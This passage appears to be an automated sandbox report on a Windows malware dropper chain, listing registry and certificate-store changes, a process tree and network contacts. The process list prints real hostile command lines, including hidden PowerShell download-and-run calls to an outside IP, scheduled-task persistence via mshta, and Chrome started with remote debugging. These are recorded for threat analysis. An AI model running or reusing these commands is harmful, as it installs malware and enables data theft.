| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\1091749001\2f4444c5a8.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\1091749001\2f4444c5a8.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe
"C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe"
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe
"C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe"
C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
"C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe"
C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
"C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1740 -s 68
C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
"C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe"
C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe
"C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn kBltRmaI8Wg /tr "mshta C:\Users\Admin\AppData\Local\Temp\hETCfbLxc.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\hETCfbLxc.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn kBltRmaI8Wg /tr "mshta C:\Users\Admin\AppData\Local\Temp\hETCfbLxc.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'AAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd" "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd" any_word
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE
"C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "qhfSJmalPrD" /tr "mshta \"C:\Temp\hWO8LyeS1.hta\"" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta "C:\Temp\hWO8LyeS1.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef70e9758,0x7fef70e9768,0x7fef70e9778
C:\Windows\system32\ctfmon.exe
ctfmon.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1136 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1488 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1100 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2360 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2384 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1120 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2276 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3496 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3616 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3616 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe
"C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe"
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe
"C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe"
C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe
"C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\5phva" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Windows\system32\taskeng.exe
taskeng.exe {BE56D322-AA82-4DF6-A41C-362E7701F7AC} S-1-5-21-3063565911-2056067323-3330884624-1000:KHBTHJFA\Admin:Interactive:[1]
C:\ProgramData\rwhkbvh\apitlt.exe
C:\ProgramData\rwhkbvh\apitlt.exe
C:\Users\Admin\AppData\Local\Temp\1091744001\728eb8fad7.exe
"C:\Users\Admin\AppData\Local\Temp\1091744001\728eb8fad7.exe"
C:\Users\Admin\AppData\Local\Temp\1091745001\fefef60740.exe
"C:\Users\Admin\AppData\Local\Temp\1091745001\fefef60740.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\1091747001\ff28c3aaec.exe
"C:\Users\Admin\AppData\Local\Temp\1091747001\ff28c3aaec.exe"
C:\Users\Admin\AppData\Local\Temp\1091749001\2f4444c5a8.exe
"C:\Users\Admin\AppData\Local\Temp\1091749001\2f4444c5a8.exe"
C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe
"C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"
C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe
"C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"
C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe
"C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2468 -s 508
C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe
"C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe"
C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe
"C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe"
C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe
"C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe"
C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe
"C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe"
C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe
"C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe"
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.43:80 | 185.215.113.43 | tcp |
| RU | 185.215.113.75:80 | 185.215.113.75 | tcp |
| US | 8.8.8.8:53 | advertised.life | udp |
| US | 104.21.94.161:443 | advertised.life | tcp |
| US | 8.8.8.8:53 | uncertainyelemz.bet | udp |
| US | 104.21.48.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.48.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.48.1:443 | uncertainyelemz.bet | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| FI | 65.109.226.203:443 | tcp | |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.200.4:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.200.42:443 | ogads-pa.googleapis.com | tcp |
| GB | 142.250.200.14:443 | apis.google.com | tcp |
| GB | 142.250.200.42:443 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.178.14:443 | play.google.com | tcp |
| GB | 142.250.178.14:443 | play.google.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| FI | 65.109.226.203:443 | tcp | |
| FI | 65.109.226.203:443 | tcp | |
| FI | 65.109.226.203:443 | tcp | |
| FI | 65.109.226.203:443 | tcp | |
| DE | 104.194.157.122:80 | 104.194.157.122 | tcp |
| FI | 65.109.226.203:443 | tcp | |
| US | 8.8.8.8:53 | pirtyoffensiz.bet | udp |
| US | 104.21.42.12:443 | pirtyoffensiz.bet | tcp |
| FI | 65.109.226.203:443 | tcp | |
| US | 104.21.48.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.48.1:443 | uncertainyelemz.bet | tcp |
| FI | 65.109.226.203:443 | tcp | |
| FI | 65.109.226.203:443 | tcp | |
| NL | 185.198.234.185:80 | cobolrationumelawrtewarms.com | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| N/A | 127.0.0.1:9223 | tcp | |
| N/A | 127.0.0.1:9223 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 104.21.48.1:443 | tcp | |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| US | 104.21.94.161:443 | advertised.life | tcp |
| US | 104.21.48.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.48.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.48.1:443 | uncertainyelemz.bet | tcp |
| US | 8.8.8.8:53 | breakfasutwy.cyou | udp |
| US | 8.8.8.8:53 | importenptoc.com | udp |
| US | 8.8.8.8:53 | voicesharped.com | udp |
| US | 8.8.8.8:53 | inputrreparnt.com | udp |
| US | 8.8.8.8:53 | torpdidebar.com | udp |
| US | 104.21.42.12:443 | pirtyoffensiz.bet | tcp |
| US | 104.21.48.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.48.1:443 | uncertainyelemz.bet | tcp |
| US | 8.8.8.8:53 | rebeldettern.com | udp |
| US | 8.8.8.8:53 | actiothreaz.com | udp |
| DE | 93.186.202.3:4000 | towerbingobongoboom.com | tcp |
| US | 104.21.48.1:443 | uncertainyelemz.bet | tcp |
| US | 8.8.8.8:53 | garulouscuto.com | udp |
| US | 8.8.8.8:53 | breedertremnd.com | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | outlinedtrai.bet | udp |
| US | 104.21.38.27:443 | outlinedtrai.bet | tcp |
| US | 8.8.8.8:53 | investiigato.website | udp |
| US | 104.21.48.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.48.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.48.1:443 | uncertainyelemz.bet | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 104.21.48.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.48.1:443 | uncertainyelemz.bet | tcp |
Files
